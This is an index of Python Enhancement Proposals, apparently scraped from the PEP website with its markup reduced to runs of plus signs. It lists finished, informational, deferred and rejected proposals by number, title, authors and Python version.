+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SF100Python Unicode IntegrationMarc-André Lemburg2.0
SF201Lockstep IterationBarry Warsaw2.0
SF202List ComprehensionsBarry Warsaw2.0
SF203Augmented AssignmentsThomas Wouters2.0
SF205Weak ReferencesFred L. Drake, Jr.2.1
SF207Rich ComparisonsGuido van Rossum, David Ascher2.1
SF208Reworking the Coercion ModelNeil Schemenauer, Marc-André Lemburg2.1
SF214Extended Print StatementBarry Warsaw2.0
SF217Display Hook for Interactive UseMoshe Zadka2.1
SF218Adding a Built-In Set Object TypeGreg Wilson, Raymond Hettinger2.2
SF221Import AsThomas Wouters2.0
SF223Change the Meaning of x EscapesTim Peters2.0
SF227Statically Nested ScopesJeremy Hylton2.1
SF229Using Distutils to Build PythonA.M. Kuchling2.1
SF230Warning FrameworkGuido van Rossum2.1
SF232Function AttributesBarry Warsaw2.1
SF234IteratorsKa-Ping Yee, Guido van Rossum2.1
SF235Import on Case-Insensitive PlatformsTim Peters2.1
SF236Back to the __future__Tim Peters2.1
SF237Unifying Long Integers and IntegersMoshe Zadka, Guido van Rossum2.2
SF238Changing the Division OperatorMoshe Zadka, Guido van Rossum2.2
SF250Using site-packages on WindowsPaul Moore2.2
SF252Making Types Look More Like ClassesGuido van Rossum2.2
SF253Subtyping Built-in TypesGuido van Rossum2.2
SF255Simple GeneratorsNeil Schemenauer, Tim Peters, Magnus Lie Hetland2.2
SF260Simplify xrange()Guido van Rossum2.2
SF261Support for “wide” Unicode charactersPaul Prescod2.2
SF263Defining Python Source Code EncodingsMarc-André Lemburg, Martin von Löwis2.3
SF264Future statements in simulated shellsMichael Hudson2.2
SF273Import Modules from Zip ArchivesJames C. Ahlstrom2.3
SF274Dict ComprehensionsBarry Warsaw2.7, 3.0
SF277Unicode file name support for Windows NTNeil Hodgson2.3
SF278Universal Newline SupportJack Jansen2.3
SF279The enumerate() built-in functionRaymond Hettinger2.3
SF282A Logging SystemVinay Sajip, Trent Mick2.3
SF285Adding a bool typeGuido van Rossum2.3
SF289Generator ExpressionsRaymond Hettinger2.4
SF292Simpler String SubstitutionsBarry Warsaw2.4
SF293Codec Error Handling CallbacksWalter Dörwald2.3
SF301Package Index and Metadata for DistutilsRichard Jones2.3
SF302New Import HooksJust van Rossum, Paul Moore2.3
SF305CSV File APIKevin Altis, Dave Cole, Andrew McNamara, Skip Montanaro, Cliff Wells2.3
SF307Extensions to the pickle protocolGuido van Rossum, Tim Peters2.3
SF308Conditional ExpressionsGuido van Rossum, Raymond Hettinger2.5
SF309Partial Function ApplicationPeter Harris2.5
SF311Simplified Global Interpreter Lock Acquisition for ExtensionsMark Hammond2.3
SF318Decorators for Functions and MethodsKevin D. Smith, Jim J. Jewett, Skip Montanaro, Anthony Baxter2.4
SF322Reverse IterationRaymond Hettinger2.4
SF324subprocess - New process modulePeter Astrand2.4
SF327Decimal Data TypeFacundo Batista2.4
SF328Imports: Multi-Line and Absolute/RelativeAahz2.4, 2.5, 2.6
SF331Locale-Independent Float/String ConversionsChristian R. Reis2.4
SF338Executing modules as scriptsAlyssa Coghlan2.5
SF341Unifying try-except and try-finallyGeorg Brandl2.5
SF342Coroutines via Enhanced GeneratorsGuido van Rossum, Phillip J. Eby2.5
SF343The “with” StatementGuido van Rossum, Alyssa Coghlan2.5
SF352Required Superclass for ExceptionsBrett Cannon, Guido van Rossum2.5
SF353Using ssize_t as the index typeMartin von Löwis2.5
SF357Allowing Any Object to be Used for SlicingTravis Oliphant2.5
SF358The “bytes” ObjectNeil Schemenauer, Guido van Rossum2.6, 3.0
SF362Function Signature ObjectBrett Cannon, Jiwon Seo, Yury Selivanov, Larry Hastings3.3
SF366Main module explicit relative importsAlyssa Coghlan2.6, 3.0
SF370Per user site-packages directoryChristian Heimes2.6, 3.0
SF371Addition of the multiprocessing package to the standard libraryJesse Noller, Richard Oudkerk2.6, 3.0
SF372Adding an ordered dictionary to collectionsArmin Ronacher, Raymond Hettinger2.7, 3.1
SF376Database of Installed Python DistributionsTarek Ziadé2.7, 3.2
SF378Format Specifier for Thousands SeparatorRaymond Hettinger2.7, 3.1
SF380Syntax for Delegating to a SubgeneratorGregory Ewing3.3
SF383Non-decodable Bytes in System Character InterfacesMartin von Löwis3.1
SF384Defining a Stable ABIMartin von Löwis3.2
SF389argparse - New Command Line Parsing ModuleSteven Bethard2.7, 3.2
SF391Dictionary-Based Configuration For LoggingVinay Sajip2.7, 3.2
SF393Flexible String RepresentationMartin von Löwis3.3
SF397Python launcher for WindowsMark Hammond, Martin von Löwis3.3
SF405Python Virtual EnvironmentsCarl Meyer3.3
SF409Suppressing exception contextEthan Furman3.3
SF412Key-Sharing DictionaryMark Shannon3.3
SF414Explicit Unicode Literal for Python 3.3Armin Ronacher, Alyssa Coghlan3.3
SF415Implement context suppression with exception attributesBenjamin Peterson3.3
SF417Including mock in the Standard LibraryMichael Foord3.3
SF418Add monotonic time, performance counter, and process time functionsCameron Simpson, Jim J. Jewett, Stephen J. Turnbull, Victor Stinner3.3
SF420Implicit Namespace PackagesEric V. Smith3.3
SF421Adding sys.implementationEric Snow3.3
SF424A method for exposing a length hintAlex Gaynor3.4
SF425Compatibility Tags for Built DistributionsDaniel Holth3.4
SF427The Wheel Binary Package Format 1.0Daniel Holth
SF428The pathlib module – object-oriented filesystem pathsAntoine Pitrou3.4
SF435Adding an Enum type to the Python standard libraryBarry Warsaw, Eli Bendersky, Ethan Furman3.4
SF436The Argument Clinic DSLLarry Hastings3.4
SF440Version Identification and Dependency SpecificationAlyssa Coghlan, Donald Stufft
SF441Improving Python ZIP Application SupportDaniel Holth, Paul Moore3.5
SF442Safe object finalizationAntoine Pitrou3.4
SF443Single-dispatch generic functionsŁukasz Langa3.4
SF445Add new APIs to customize Python memory allocatorsVictor Stinner3.4
SF446Make newly created file descriptors non-inheritableVictor Stinner3.4
SF448Additional Unpacking GeneralizationsJoshua Landau3.5
SF450Adding A Statistics Module To The Standard LibrarySteven D’Aprano3.4
SF451A ModuleSpec Type for the Import SystemEric Snow3.4
SF453Explicit bootstrapping of pip in Python installationsDonald Stufft, Alyssa Coghlan
SF454Add a new tracemalloc module to trace Python memory allocationsVictor Stinner3.4
SF456Secure and interchangeable hash algorithmChristian Heimes3.4
SF461Adding % formatting to bytes and bytearrayEthan Furman3.5
SF465A dedicated infix operator for matrix multiplicationNathaniel J. Smith3.5
SF466Network Security Enhancements for Python 2.7.xAlyssa Coghlan2.7.9
SF468Preserving the order of **kwargs in a function.Eric Snow3.6
SF471os.scandir() function – a better and faster directory iteratorBen Hoyt3.5
SF475Retry system calls failing with EINTRCharles-François Natali, Victor Stinner3.5
SF476Enabling certificate verification by default for stdlib http clientsAlex Gaynor2.7.9, 3.4.3, 3.5
SF477Backport ensurepip (PEP 453) to Python 2.7Donald Stufft, Alyssa Coghlan
SF479Change StopIteration handling inside generatorsChris Angelico, Guido van Rossum3.5
SF484Type HintsGuido van Rossum, Jukka Lehtosalo, Łukasz Langa3.5
SF485A Function for testing approximate equalityChristopher Barker3.5
SF486Make the Python Launcher aware of virtual environmentsPaul Moore3.5
SF487Simpler customisation of class creationMartin Teichmann3.6
SF488Elimination of PYO filesBrett Cannon3.5
SF489Multi-phase extension module initializationPetr Viktorin, Stefan Behnel, Alyssa Coghlan3.5
SF492Coroutines with async and await syntaxYury Selivanov3.5
SF493HTTPS verification migration tools for Python 2.7Alyssa Coghlan, Robert Kuska, Marc-André Lemburg2.7.12
SF495Local Time DisambiguationAlexander Belopolsky, Tim Peters3.6
SF498Literal String InterpolationEric V. Smith3.6
SF503Simple Repository APIDonald Stufft
SF506Adding A Secrets Module To The Standard LibrarySteven D’Aprano3.6
SF508Dependency specification for Python Software PackagesRobert Collins
SF515Underscores in Numeric LiteralsGeorg Brandl, Serhiy Storchaka3.6
SF517A build-system independent format for source treesNathaniel J. Smith, Thomas Kluyver
SF518Specifying Minimum Build System Requirements for Python ProjectsBrett Cannon, Nathaniel J. Smith, Donald Stufft
SF519Adding a file system path protocolBrett Cannon, Koos Zevenhoven3.6
SF520Preserving Class Attribute Definition OrderEric Snow3.6
SF523Adding a frame evaluation API to CPythonBrett Cannon, Dino Viehland3.6
SF524Make os.urandom() blocking on LinuxVictor Stinner3.6
SF525Asynchronous GeneratorsYury Selivanov3.6
SF526Syntax for Variable AnnotationsRyan Gonzalez, Philip House, Ivan Levkivskyi, Lisa Roach, Guido van Rossum3.6
SF527Removing Un(der)used file types/extensions on PyPIDonald Stufft
SF528Change Windows console encoding to UTF-8Steve Dower3.6
SF529Change Windows filesystem encoding to UTF-8Steve Dower3.6
SF530Asynchronous ComprehensionsYury Selivanov3.6
SF538Coercing the legacy C locale to a UTF-8 based localeAlyssa Coghlan3.7
SF539A New C-API for Thread-Local Storage in CPythonErik M. Bray, Masayuki Yamamoto3.7
SF540Add a new UTF-8 ModeVictor Stinner3.7
SF544Protocols: Structural subtyping (static duck typing)Ivan Levkivskyi, Jukka Lehtosalo, Łukasz Langa3.8
SF552Deterministic pycsBenjamin Peterson3.7
SF553Built-in breakpoint()Barry Warsaw3.7
SF557Data ClassesEric V. Smith3.7
SF560Core support for typing module and generic typesIvan Levkivskyi3.7
SF561Distributing and Packaging Type InformationEthan Smith3.7
SF562Module __getattr__ and __dir__Ivan Levkivskyi3.7
SF564Add new time functions with nanosecond resolutionVictor Stinner3.7
SF565Show DeprecationWarning in __main__Alyssa Coghlan3.7
SF566Metadata for Python Software Packages 2.1Dustin Ingram3.x
SF567Context VariablesYury Selivanov3.7
SF570Python Positional-Only ParametersLarry Hastings, Pablo Galindo, Mario Corchero, Eric N. Vander Weele3.8
SF572Assignment ExpressionsChris Angelico, Tim Peters, Guido van Rossum3.8
SF573Module State Access from C Extension MethodsPetr Viktorin, Alyssa Coghlan, Eric Snow, Marcel Plch3.9
SF574Pickle protocol 5 with out-of-band dataAntoine Pitrou3.8
SF578Python Runtime Audit HooksSteve Dower3.8
SF584Add Union Operators To dictSteven D’Aprano, Brandt Bucher3.9
SF585Type Hinting Generics In Standard CollectionsŁukasz Langa3.9
SF586Literal TypesMichael Lee, Ivan Levkivskyi, Jukka Lehtosalo3.8
SF587Python Initialization ConfigurationVictor Stinner, Alyssa Coghlan3.8
SF589TypedDict: Type Hints for Dictionaries with a Fixed Set of KeysJukka Lehtosalo3.8
SF591Adding a final qualifier to typingMichael J. Sullivan, Ivan Levkivskyi3.8
SF592Adding “Yank” Support to the Simple APIDonald Stufft
SF593Flexible function and variable annotationsTill Varoquaux, Konstantin Kashin3.9
SF594Removing dead batteries from the standard libraryChristian Heimes, Brett Cannon3.11
SF597Add optional EncodingWarningInada Naoki3.10
SF600Future ‘manylinux’ Platform Tags for Portable Linux Built DistributionsNathaniel J. Smith, Thomas Kluyver
SF604Allow writing union types as X | YPhilippe PRADOS, Maggie Moss3.10
SF610Recording the Direct URL Origin of installed distributionsStéphane Bidoul, Chris Jerdonek
SF612Parameter Specification VariablesMark Mendoza3.10
SF613Explicit Type AliasesShannon Zhu3.10
SF614Relaxing Grammar Restrictions On DecoratorsBrandt Bucher3.9
SF615Support for the IANA Time Zone Database in the Standard LibraryPaul Ganssle3.9
SF616String methods to remove prefixes and suffixesDennis Sweeney3.9
SF617New PEG parser for CPythonGuido van Rossum, Pablo Galindo, Lysandros Nikolaou3.9
SF618Add Optional Length-Checking To zipBrandt Bucher3.10
SF621Storing project metadata in pyproject.tomlBrett Cannon, Dustin Ingram, Paul Ganssle, Pradyun Gedam, Sébastien Eustace, Thomas Kluyver, Tzu-ping Chung
SF623Remove wstr from UnicodeInada Naoki3.10
SF624Remove Py_UNICODE encoder APIsInada Naoki3.11
SF626Precise line numbers for debugging and other tools.Mark Shannon3.10
SF627Recording installed projectsPetr Viktorin
SF628Add math.tauAlyssa Coghlan3.6
SF629Versioning PyPI’s Simple APIDonald Stufft
SF632Deprecate distutils moduleSteve Dower3.10
SF634Structural Pattern Matching: SpecificationBrandt Bucher, Guido van Rossum3.10
SF643Metadata for Package Source DistributionsPaul Moore
SF644Require OpenSSL 1.1.1 or newerChristian Heimes3.10
SF646Variadic GenericsMark Mendoza, Matthew Rahtz, Pradeep Kumar Srinivasan, Vincent Siles3.11
SF647User-Defined Type GuardsEric Traut3.10
SF652Maintaining the Stable ABIPetr Viktorin3.10
SF654Exception Groups and except*Irit Katriel, Yury Selivanov, Guido van Rossum3.11
SF655Marking individual TypedDict items as required or potentially-missingDavid Foster3.11
SF656Platform Tag for Linux Distributions Using MuslTzu-ping Chung
SF657Include Fine Grained Error Locations in TracebacksPablo Galindo, Batuhan Taskaya, Ammar Askar3.11
SF660Editable installs for pyproject.toml based builds (wheel based)Daniel Holth, Stéphane Bidoul
SF667Consistent views of namespacesMark Shannon, Tian Gao3.13
SF669Low Impact Monitoring for CPythonMark Shannon3.12
SF670Convert macros to functions in the Python C APIErlend Egeberg Aasland, Victor Stinner3.11
SF673Self TypePradeep Kumar Srinivasan, James Hilton-Balfe3.11
SF675Arbitrary Literal String TypePradeep Kumar Srinivasan, Graham Bleaney3.11
SF678Enriching Exceptions with NotesZac Hatfield-Dodds3.11
SF680tomllib: Support for Parsing TOML in the Standard LibraryTaneli Hukkinen, Shantanu Jain3.11
SF681Data Class TransformsErik De Bonte, Eric Traut3.11
SF682Format Specifier for Signed ZeroJohn Belmonte3.11
SF683Immortal Objects, Using a Fixed RefcountEric Snow, Eddie Elizondo3.12
SF684A Per-Interpreter GILEric Snow3.12
SF688Making the buffer protocol accessible in PythonJelle Zijlstra3.12
SF689Unstable C API tierPetr Viktorin3.12
SF692Using TypedDict for more precise **kwargs typingFranek Magiera3.12
SF695Type Parameter SyntaxEric Traut3.12
SF696Type Defaults for Type ParametersJames Hilton-Balfe3.13
SF697Limited C API for Extending Opaque TypesPetr Viktorin3.12
SF698Override Decorator for Static TypingSteven Troxler, Joshua Xu, Shannon Zhu3.12
SF700Additional Fields for the Simple API for Package IndexesPaul Moore
SF702Marking deprecations using the type systemJelle Zijlstra3.13
SF705TypedDict: Read-only itemsAlice Purcell3.13
SF706Filter for tarfile.extractallPetr Viktorin3.12
SF709Inlined comprehensionsCarl Meyer3.12
SF715Disabling bdist_egg distribution uploads on PyPIWilliam Woodruff
SF721Using tarfile.data_filter for source distribution extractionPetr Viktorin3.12
SF723Inline script metadataOfek Lev
SF730Adding iOS as a supported platformRussell Keith-Magee3.13
SF737C API to format a type fully qualified nameVictor Stinner3.13
SF738Adding Android as a supported platformMalcolm Smith3.13
SF740Index support for digital attestationsWilliam Woodruff, Facundo Tuesca, Dustin Ingram
SF741Python Configuration C APIVictor Stinner3.14
SF742Narrowing types with TypeIsJelle Zijlstra3.13
SF757C API to import-export Python integersSergey B Kirpichev, Victor Stinner3.14
SF3101Advanced String FormattingTalin3.0
SF3102Keyword-Only ArgumentsTalin3.0
SF3104Access to Names in Outer ScopesKa-Ping Yee3.0
SF3105Make print a functionGeorg Brandl3.0
SF3106Revamping dict.keys(), .values() and .items()Guido van Rossum3.0
SF3107Function AnnotationsCollin Winter, Tony Lownds3.0
SF3108Standard Library ReorganizationBrett Cannon3.0
SF3109Raising Exceptions in Python 3000Collin Winter3.0
SF3110Catching Exceptions in Python 3000Collin Winter3.0
SF3111Simple input built-in in Python 3000Andre Roberge3.0
SF3112Bytes literals in Python 3000Jason Orendorff3.0
SF3113Removal of Tuple Parameter UnpackingBrett Cannon3.0
SF3114Renaming iterator.next() to iterator.__next__()Ka-Ping Yee3.0
SF3115Metaclasses in Python 3000Talin3.0
SF3116New I/ODaniel Stutzbach, Guido van Rossum, Mike Verdone3.0
SF3118Revising the buffer protocolTravis Oliphant, Carl Banks3.0
SF3119Introducing Abstract Base ClassesGuido van Rossum, Talin3.0
SF3120Using UTF-8 as the default source encodingMartin von Löwis3.0
SF3121Extension Module Initialization and FinalizationMartin von Löwis3.0
SF3123Making PyObject_HEAD conform to standard CMartin von Löwis3.0
SF3127Integer Literal Support and SyntaxPatrick Maupin3.0
SF3129Class DecoratorsCollin Winter3.0
SF3131Supporting Non-ASCII IdentifiersMartin von Löwis3.0
SF3132Extended Iterable UnpackingGeorg Brandl3.0
SF3134Exception Chaining and Embedded TracebacksKa-Ping Yee3.0
SF3135New SuperCalvin Spealman, Tim Delaney, Lie Ryan3.0
SF3137Immutable Bytes and Mutable BufferGuido van Rossum3.0
SF3138String representation in Python 3000Atsuo Ishimoto3.0
SF3141A Type Hierarchy for NumbersJeffrey Yasskin3.0
SF3144IP Address Manipulation Library for the Python Standard LibraryPeter Moody3.3
SF3147PYC Repository DirectoriesBarry Warsaw3.2
SF3148futures - execute computations asynchronouslyBrian Quinlan3.2
SF3149ABI version tagged .so filesBarry Warsaw3.2
SF3151Reworking the OS and IO exception hierarchyAntoine Pitrou3.3
SF3154Pickle protocol version 4Antoine Pitrou3.4
SF3155Qualified name for classes and functionsAntoine Pitrou3.3
SF3156Asynchronous IO Support Rebooted: the “asyncio” ModuleGuido van Rossum3.3
+
+
+

Historical Meta-PEPs and Informational PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
PS5Guidelines for Language EvolutionPaul Prescod
PS6Bug Fix ReleasesAahz, Anthony Baxter
IF160Python 1.6 Release ScheduleFred L. Drake, Jr.1.6
IF200Python 2.0 Release ScheduleJeremy Hylton2.0
IF226Python 2.1 Release ScheduleJeremy Hylton2.1
IF251Python 2.2 Release ScheduleBarry Warsaw, Guido van Rossum2.2
IF283Python 2.3 Release ScheduleGuido van Rossum2.3
IF320Python 2.4 Release ScheduleBarry Warsaw, Raymond Hettinger, Anthony Baxter2.4
PF347Migrating the Python CVS to SubversionMartin von Löwis
IF356Python 2.5 Release ScheduleNeal Norwitz, Guido van Rossum, Anthony Baxter2.5
PF360Externally Maintained PackagesBrett Cannon
IF361Python 2.6 and 3.0 Release ScheduleNeal Norwitz, Barry Warsaw2.6, 3.0
IF373Python 2.7 Release ScheduleBenjamin Peterson2.7
PF374Choosing a distributed VCS for the Python projectBrett Cannon, Stephen J. Turnbull, Alexandre Vassalotti, Barry Warsaw, Dirkjan Ochtman
IF375Python 3.1 Release ScheduleBenjamin Peterson3.1
PF385Migrating from Subversion to MercurialDirkjan Ochtman, Antoine Pitrou, Georg Brandl
IF392Python 3.2 Release ScheduleGeorg Brandl3.2
IF398Python 3.3 Release ScheduleGeorg Brandl3.3
IF404Python 2.8 Un-release ScheduleBarry Warsaw2.8
IF429Python 3.4 Release ScheduleLarry Hastings3.4
PS438Transitioning to release-file hosting on PyPIHolger Krekel, Carl Meyer
PF449Removal of the PyPI Mirror Auto Discovery and Naming SchemeDonald Stufft
PF464Removal of the PyPI Mirror Authenticity APIDonald Stufft
PF470Removing External Hosting Support on PyPIDonald Stufft
IF478Python 3.5 Release ScheduleLarry Hastings3.5
IF494Python 3.6 Release ScheduleNed Deily3.6
PF512Migrating from hg.python.org to GitHubBrett Cannon
IF537Python 3.7 Release ScheduleNed Deily3.7
PF541Package Index Name RetentionŁukasz Langa
IF569Python 3.8 Release ScheduleŁukasz Langa3.8
PF581Using GitHub Issues for CPythonMariatta
PF3000Python 3000Guido van Rossum
PF3002Procedure for Backwards-Incompatible ChangesSteven Bethard
PF3003Python Language MoratoriumBrett Cannon, Jesse Noller, Guido van Rossum
PF3099Things that will Not Change in Python 3000Georg Brandl
PF3100Miscellaneous Python 3.0 PlansBrett Cannon
PF8001Python Governance Voting ProcessBrett Cannon, Christian Heimes, Donald Stufft, Eric Snow, Gregory P. Smith, Łukasz Langa, Mariatta, Nathaniel J. Smith, Pablo Galindo Salgado, Raymond Hettinger, Tal Einat, Tim Peters, Zachary Ware
+
+
+

Deferred PEPs (postponed pending further research or updates)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SD213Attribute Access HandlersPaul Prescod2.1
SD219Stackless PythonGordon McMillan2.1
SD222Web Library EnhancementsA.M. Kuchling2.1
SD233Python Online HelpPaul Prescod2.1
SD267Optimized Access to Module NamespacesJeremy Hylton2.2
SD269Pgen Module for PythonJonathan Riehl2.2
SD280Optimizing access to globalsGuido van Rossum2.3
SD286Enhanced Argument TuplesMartin von Löwis2.3
SD312Simple Implicit LambdaRoman Suzi, Alex Martelli2.4
SD316Programming by Contract for PythonTerence Way
SD323Copyable IteratorsAlex Martelli2.5
SD337Logging Usage in the Standard LibraryMichael P. Dubner2.5
SD368Standard image protocol and classLino Mastrodomenico2.6, 3.0
SD400Deprecate codecs.StreamReader and codecs.StreamWriterVictor Stinner3.3
SD403General purpose decorator clause (aka “@in” clause)Alyssa Coghlan3.4
PD407New release cycle and introducing long-term support versionsAntoine Pitrou, Georg Brandl, Barry Warsaw
SD419Protecting cleanup statements from interruptionsPaul Colomiets3.3
ID423Naming conventions and recipes related to packagingBenoit Bryon
ID444Python Web3 InterfaceChris McDonough, Armin Ronacher
SD447Add __getdescriptor__ method to metaclassRonald Oussoren
SD491The Wheel Binary Package Format 1.9Daniel Holth
SD499python -m foo should also bind ‘foo’ in sys.modulesCameron Simpson, Chris Angelico, Joseph Jevnik3.10
SD505None-aware operatorsMark E. Haase, Steve Dower3.8
SD532A circuit breaking protocol and binary operatorsAlyssa Coghlan, Mark E. Haase3.8
SD533Deterministic cleanup for iteratorsNathaniel J. Smith
SD534Improved Errors for Missing Standard Library ModulesTomáš Orsava, Petr Viktorin, Alyssa Coghlan
SD535Rich comparison chainingAlyssa Coghlan3.8
SD547Running extension modules using the -m optionMarcel Plch, Petr Viktorin3.7
SD556Threaded garbage collectionAntoine Pitrou3.7
SD568Generator-sensitivity for Context VariablesNathaniel J. Smith3.8
SD674Disallow using macros as l-valuesVictor Stinner3.12
SD734Multiple Interpreters in the StdlibEric Snow3.13
SD3124Overloading, Generic Functions, Interfaces, and AdaptationPhillip J. Eby
SD3143Standard daemon process libraryBen Finney3.x
SD3150Statement local namespaces (aka “given” clause)Alyssa Coghlan3.4
+
+
+

Rejected, Superseded, and Withdrawn PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
PW3Guidelines for Handling Bug ReportsJeremy Hylton
PW9Sample Plaintext PEP TemplateBarry Warsaw
PW42Feature RequestsJeremy Hylton
IS102Doing Python Micro ReleasesAnthony Baxter, Barry Warsaw, Guido van Rossum
IW103Collecting information about gitOleg Broytman
SR204Range LiteralsThomas Wouters2.0
IW206Python Advanced LibraryA.M. Kuchling
SW209Multi-dimensional ArraysPaul Barrett, Travis Oliphant2.2
SR210Decoupling the Interpreter LoopDavid Ascher2.1
SR211Adding A New Outer Product OperatorGreg Wilson2.1
SR212Loop Counter IterationPeter Schneider-Kamp2.1
SS215String InterpolationKa-Ping Yee2.1
IW216Docstring FormatMoshe Zadka
IR220Coroutines, Generators, ContinuationsGordon McMillan
SR224Attribute DocstringsMarc-André Lemburg2.1
SR225Elementwise/Objectwise OperatorsHuaiyu Zhu, Gregory Lielens2.1
SW228Reworking Python’s Numeric ModelMoshe Zadka, Guido van Rossum
SR231__findattr__()Barry Warsaw2.1
SR239Adding a Rational Type to PythonChristopher A. Craig, Moshe Zadka2.2
SR240Adding a Rational Literal to PythonChristopher A. Craig, Moshe Zadka2.2
SS241Metadata for Python Software PackagesA.M. Kuchling
SW242Numeric KindsPaul F. Dubois2.2
SW243Module Repository Upload MechanismSean Reifschneider2.1
SR244The directive statementMartin von Löwis2.1
SR245Python Interface SyntaxMichel Pelletier2.2
SR246Object AdaptationAlex Martelli, Clark C. Evans2.5
SR254Making Classes Look More Like TypesGuido van Rossum2.2
SR256Docstring Processing System FrameworkDavid Goodger
SR258Docutils Design SpecificationDavid Goodger
SR259Omit printing newline after newlineGuido van Rossum2.2
SR262A Database of Installed Python PackagesA.M. Kuchling
SR265Sorting Dictionaries by ValueGrant Griffin2.2
SW266Optimizing Global Variable/Attribute AccessSkip Montanaro2.3
SR268Extended HTTP functionality and WebDAVGreg Stein2.x
SR270uniq method for list objectsJason Petrone2.2
SR271Prefixing sys.path by command line optionFrédéric B. Giacometti2.2
SR275Switching on Multiple ValuesMarc-André Lemburg2.6
SR276Simple Iterator for intsJim Althoff2.3
SR281Loop Counter Iteration with range and xrangeMagnus Lie Hetland2.3
SR284Integer for-loopsDavid Eppstein, Gregory Ewing2.3
SW288Generators Attributes and ExceptionsRaymond Hettinger2.5
IS291Backward Compatibility for the Python 2 Standard LibraryNeal Norwitz2.3
SR294Type Names in the types ModuleOren Tirosh2.5
SR295Interpretation of multiline string constantsStepan Koltsov3.0
SW296Adding a bytes Object TypeScott Gilbert2.3
SR297Support for System UpgradesMarc-André Lemburg2.6
SW298The Locked Buffer InterfaceThomas Heller2.3
SR299Special __main__() function in modulesJeff Epler2.3
SR303Extend divmod() for Multiple DivisorsThomas Bellman2.3
SW304Controlling Generation of Bytecode FilesSkip Montanaro
IW306How to Change Python’s GrammarMichael Hudson, Jack Diederich, Alyssa Coghlan, Benjamin Peterson
SR310Reliable Acquisition/Release PairsMichael Hudson, Paul Moore2.4
SR313Adding Roman Numeral Literals to PythonMike Meyer2.4
SS314Metadata for Python Software Packages 1.1A.M. Kuchling, Richard Jones2.5
SR315Enhanced While LoopRaymond Hettinger, W Isaac Carroll2.5
SR317Eliminate Implicit Exception InstantiationSteven Taschuk2.4
SR319Python Synchronize/Asynchronize BlockMichel Pelletier2.4
SW321Date/Time Parsing and FormattingA.M. Kuchling2.4
SR325Resource-Release Support for GeneratorsSamuele Pedroni2.4
SR326A Case for Top and Bottom ValuesJosiah Carlson, Terry Reedy2.4
SR329Treating Builtins as Constants in the Standard LibraryRaymond Hettinger2.4
SR330Python Bytecode VerificationMichel Pelletier2.6
SR332Byte vectors and String/Unicode UnificationSkip Montanaro2.5
